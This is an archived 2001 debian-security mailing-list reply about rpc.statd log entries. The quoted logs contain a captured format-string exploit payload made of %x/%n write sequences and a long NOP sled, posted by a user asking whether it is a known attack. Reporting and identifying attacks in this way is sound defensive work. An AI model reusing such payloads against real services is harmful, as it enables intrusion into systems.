Re: rpc.statd being attacked?

To: <debian-security@lists.debian.org>, "Daniel Schepler" <schepler@math.berkeley.edu>
Subject: Re: rpc.statd being attacked?
From: "kath" <kath@kathweb.net>
Date: Tue, 21 Aug 2001 18:01:43 -0400
Message-id: <[🔎] 00e901c12a8c$fe773da0$0c00a8c0@optonline.net>
References: <[🔎] 87wv3xw42f.fsf@adsl-63-193-247-253.dsl.snfc21.pacbell.net>

I think this is an 800 year old Red Hat exploit, so probably no worries.

No need to worry, but any rpc services are lousy to have running anyway.

- k

----- Original Message -----
From: "Daniel Schepler" <schepler@math.berkeley.edu>
To: <debian-security@lists.debian.org>
Sent: Tuesday, August 21, 2001 4:28 PM
Subject: rpc.statd being attacked?


> I've gotten logs several times that read something like
>
> Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error
for ^X
>
<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><F
F>
>
<BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10
x%n%
>
192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2
>
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20
>
> (This is at least the way it reads in less.)  For now I've just shut
> down the rpc.statd daemon, but I was wondering if this is a known
> attack.
> --
> Daniel Schepler              "Please don't disillusion me.  I
> schepler@math.berkeley.edu    haven't had breakfast yet."
>                                  -- Orson Scott Card
>
>
> --
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org
>

Reply to:

References:
- rpc.statd being attacked?
  - From: Daniel Schepler <schepler@math.berkeley.edu>

Prev by Date: Re: apt sources.list
Next by Date: Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)
Previous by thread: rpc.statd being attacked?
Next by thread: Re: rpc.statd being attacked?
Index(es):
- Date
- Thread